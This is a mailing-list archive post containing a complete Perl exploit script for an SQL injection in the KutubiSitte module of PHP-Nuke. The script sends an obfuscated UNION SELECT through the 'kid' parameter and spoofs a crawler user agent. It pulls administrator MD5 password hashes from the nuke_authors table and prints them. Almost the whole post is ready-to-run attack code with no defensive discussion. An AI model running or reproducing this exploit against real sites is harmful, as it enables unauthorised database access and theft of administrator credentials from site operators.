<<< Date Index >>>     <<< Thread Index >>>

PHP-Nuke KutubiSitte "kid" SQL Injection exploit code adding



#!/usr/bin/perl 
use Getopt::Std;
use LWP::UserAgent;

sub usg{
printf("


   -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
   |  PHP-NUKE  KutubiSitte [kid]  =>  SQL Injection   |
   -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
  #######################################################
  # Bug by Lovebug Exploit-Code by r080cy90r from RBT-4 #
  #######################################################
<-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->->
#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#
#:-------------------------------------------------------:#
:#|                    USAGE:                           |#:
:#| exploit.pl -h [Hostname] -p [Path] -U [User_Id]     |#:
#:-------------------------------------------------------:#
#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#
#:-------------------------------------------------------:#
:#|                   EXAMPLE:                          |#:
:#|  exploit.pl -h http://site.com -p /php-nuke/ -U 1   |#:
#:-------------------------------------------------------:#
#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#


");
}
sub problem{
    print "\n\n[~] SITO NON VULNERABILE [~]\n\n";
    exit();
}
sub exploitation{
    
    $conn = LWP::UserAgent -> new;
    $conn->agent('Checkbot/0.4 ');
    $query_pwd = 
$host.$path."modules.php?name=KutubiSitte&h_op=hadisgoster&kid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0,aid,pwd,4%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D".$user_id."%2F%2A";
    $return_pwd = $conn->get($query_pwd) || problem();
    $return_pwd->content() =~ /([0-9,a-f]{32})/ || problem();
    print "\n \[~\] Admin Password(md5)=$user_id is: $1 \[~\]\n\n ";
   }

getopts(":h:p:U:",\%args);
     $host = $args{h} if (defined $args{h});
     $path = $args{p} if (defined $args{p});
     $user_id= $args{U}if (defined $args{U});
     
     if (!defined $args{h} || !defined $args{p} || !defined $args{U}){
        usg();
     }
     else{
        exploitation();
     }